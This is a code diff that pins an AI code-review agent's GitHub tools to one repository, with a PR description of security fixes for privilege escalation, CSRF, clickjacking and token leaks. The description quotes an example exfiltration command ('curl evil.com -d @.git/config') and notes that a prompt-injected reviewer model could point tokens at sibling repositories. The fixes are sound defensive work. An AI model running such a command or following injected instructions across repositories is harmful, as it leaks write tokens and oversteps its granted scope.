-    repo: v.string(),
-    path: v.string(),
-    ref: v.string(),
-  }),
-  async run({ data }) {
-    const token = await tokenFor(data.owner, data.repo);
-    const res = await gh(
-      token,
-      `/repos/${data.owner}/${data.repo}/contents/${data.path}?ref=${encodeURIComponent(data.ref)}`,
-      { accept: 'application/vnd.github.raw+json' },
-    );
-    return { output: truncate(await res.text(), MAX_FILE_CHARS, `file ${data.path}`) };
-  },
-});
+export const makeFetchFile = (pin: RepoPin) =>
+  defineTool({
+    name: 'fetch_file',
+    description:
+      'Fetch the full contents of one file from the repository at a given ref (branch or commit SHA). ' +
+      'Use this when the diff alone lacks context — e.g. to see the whole function or module a hunk touches. ' +
+      'Use the PR headSha to read the changed version, or the base branch name for the original.',
+    input: v.object({
+      owner: v.string(),
+      repo: v.string(),
+      path: v.string(),
+      ref: v.string(),
+    }),
+    async run({ data }) {
+      assertPinned(pin, data.owner, data.repo);
+      const token = await tokenFor(data.owner, data.repo);
+      const res = await gh(
+        token,
+        `/repos/${data.owner}/${data.repo}/contents/${data.path}?ref=${encodeURIComponent(data.ref)}`,
+        { accept: 'application/vnd.github.raw+json' },
+      );
+      return { output: truncate(await res.text(), MAX_FILE_CHARS, `file ${data.path}`) };
+    },
+  });
 
 // GraphQL is the only API surface that exposes review-thread resolution
 // state, which the re-review rules depend on.
@@ -243,51 +269,53 @@ interface ThreadsQueryResult {
 
 const MAX_THREAD_BODY_CHARS = 2_000;
 
-export const fetchReviewThreads = defineTool({
-  name: 'fetch_review_threads',
-  description:
-    'Fetch the existing reviews and inline comment threads on a pull request, including each ' +
-    "thread's resolution state and any replies. Call this on a re-review to reconcile your " +
-    'earlier findings with what happened since: which threads were resolved, and how the ' +
-    'author responded.',
-  input: v.object({
-    owner: v.string(),
-    repo: v.string(),
-    number: v.number(),
-  }),
-  async run({ data }) {
-    const token = await tokenFor(data.owner, data.repo);
-    const result = await ghGraphql<ThreadsQueryResult>(token, THREADS_QUERY, {
-      owner: data.owner,
-      repo: data.repo,
-      number: data.number,
-    });
-    const pr = result.repository?.pullRequest;
-    if (!pr) throw new Error(`pull request ${data.owner}/${data.repo}#${data.number} not found`);
-    const clip = (text: string) => truncate(text, MAX_THREAD_BODY_CHARS, 'comment');
-    return {
-      output: {
-        reviews: pr.reviews.nodes.map((r) => ({
-          author: r.author?.login ?? 'unknown',
-          state: r.state,
-          submittedAt: r.submittedAt,
-          body: clip(r.body),
-        })),
-        threads: pr.reviewThreads.nodes.map((t) => ({
-          path: t.path,
-          line: t.line,
-          resolved: t.isResolved,
-          outdated: t.isOutdated,
-          comments: t.comments.nodes.map((c) => ({
-            author: c.author?.login ?? 'unknown',
-            createdAt: c.createdAt,
-            body: clip(c.body),
+export const makeFetchReviewThreads = (pin: RepoPin) =>
+  defineTool({
+    name: 'fetch_review_threads',
+    description:
+      'Fetch the existing reviews and inline comment threads on a pull request, including each ' +
+      "thread's resolution state and any replies. Call this on a re-review to reconcile your " +
+      'earlier findings with what happened since: which threads were resolved, and how the ' +
+      'author responded.',
+    input: v.object({
+      owner: v.string(),
+      repo: v.string(),
+      number: v.number(),
+    }),
+    async run({ data }) {
+      assertPinned(pin, data.owner, data.repo);
+      const token = await tokenFor(data.owner, data.repo);
+      const result = await ghGraphql<ThreadsQueryResult>(token, THREADS_QUERY, {
+        owner: data.owner,
+        repo: data.repo,
+        number: data.number,
+      });
+      const pr = result.repository?.pullRequest;
+      if (!pr) throw new Error(`pull request ${data.owner}/${data.repo}#${data.number} not found`);
+      const clip = (text: string) => truncate(text, MAX_THREAD_BODY_CHARS, 'comment');
+      return {
+        output: {
+          reviews: pr.reviews.nodes.map((r) => ({
+            author: r.author?.login ?? 'unknown',
+            state: r.state,
+            submittedAt: r.submittedAt,
+            body: clip(r.body),
           })),
-        })),
-      },
-    };
-  },
-});
+          threads: pr.reviewThreads.nodes.map((t) => ({
+            path: t.path,
+            line: t.line,
+            resolved: t.isResolved,
+            outdated: t.isOutdated,
+            comments: t.comments.nodes.map((c) => ({
+              author: c.author?.login ?? 'unknown',
+              createdAt: c.createdAt,
+              body: clip(c.body),
+            })),
+          })),
+        },
+      };
+    },
+  });
 
 const findingSchema = v.object({
   path: v.pipe(v.string(), v.minLength(1)),
@@ -325,7 +353,7 @@ function findingsAsMarkdown(findings: v.InferOutput<typeof findingSchema>[]): st
 // A per-render factory rather than a shared definition: the tool closes over
 // the agent instance id so completing the D1 review row targets exactly the
 // dispatch that ran it — concurrent agents on the same PR never collide.
-export const makePostReview = (agentInstanceId: string) =>
+export const makePostReview = (agentInstanceId: string, pin: RepoPin = null) =>
   defineTool({
     name: 'post_review',
     description:
@@ -343,6 +371,7 @@ export const makePostReview = (agentInstanceId: string) =>
       findings: v.optional(v.array(findingSchema), []),
     }),
     async run({ data }) {
+      assertPinned(pin, data.owner, data.repo);
       const row = await getRepoByFullName(data.owner, data.repo);
       if (!row) {
         throw new Error(


### PR DESCRIPTION
Addresses two rounds of security review findings. Each was verified against the code before fixing; two flagged items were judged not worth fixing and are noted at the bottom.

## P1 — Privilege escalation via installation membership

The API authorized every action on "the user's GitHub install appears in `/user/installations`", which GitHub reports to **read-only** org members, and cockpit merge/abandon fell back to the App installation token — bypassing the caller's real GitHub permissions.

- New `fetchUserCanPush` (github-app.ts) reads the caller's own `permissions` block from `GET /repos/{owner}/{repo}` with their user token; `userCanPushToRepo` (auth.ts) caches it 5 min and fails closed.
- `requireRepoPush` now gates: cockpit **merge**, **abandon**, **cockpit-comment submit**, `PATCH /repos/:id` (all toggles incl. `check_command`), and the per-repo agent/skill toggles.
- Push (write) is the single bar everywhere: push members can already merge PRs on GitHub and already get sandbox code execution via repo code, so admin-only settings would add lockout risk without adding safety.

## P1 — Sandbox write-token exfiltration via `check_command`

The fixer and conflict resolver left the token-embedded remote URL in `.git/config` through the agent run **and** the user-set check command (scrubbed only in `finally`). A member who could set `check_command` could exfiltrate the contents:write token (e.g. `curl evil.com -d @.git/config`).

- Both now scrub the remote immediately after clone, before any untrusted content executes; pushes (and the resolver's base fetch) use env-supplied explicit URLs — the same pattern generation/automation/verifier already used.
- Ref names travel via env vars, not shell interpolation (`merge "origin/$BASE_REF"`) — git ref names may legally contain characters the shell evaluates inside double quotes.
- The resolver's base fetch also gained an explicit refspec into `refs/remotes/origin/<base>` so the merge resolves reliably on a single-branch clone.

## P2 / hardening

- **CSRF**: Origin-check middleware on all mutating `/api/*` requests — a present-but-mismatched `Origin` gets a 403, so protection no longer rests solely on the SameSite cookie default.
- **Clickjacking / sniffing**: all HTML responses get `frame-ancestors 'none'` + `X-Frame-Options: DENY` + `Referrer-Policy`; every response (incl. `/artifacts/*`) gets `X-Content-Type-Options: nosniff`.
- **Uploads**: `POST /api/uploads` now requires ≥1 installation (any GitHub account could previously upload unlimited 10 MB files). Quota + orphan GC tracked as follow-up.
- **Reviewer agent tools**: `fetch_pr` / `fetch_file` / `fetch_review_threads` / `post_review` are per-dispatch factories pinned to the dispatched PR's repository — a prompt-injected model can no longer point installation-scoped tokens at sibling repos.
- **Leak in error paths**: generation/automation agent failure output is now scrubbed before persisting to `features.error` / `automation_runs.error` (rendered in the dashboard); every sibling call site already scrubbed.
- **MCP OAuth discovery**: discovered authorization/token/registration endpoints must be https (localhost http allowed for dev) — the token endpoint receives the auth code + client secret, and previously nothing enforced the scheme.

🤖 Generated with [Claude Code](https://claude.com/claude-code)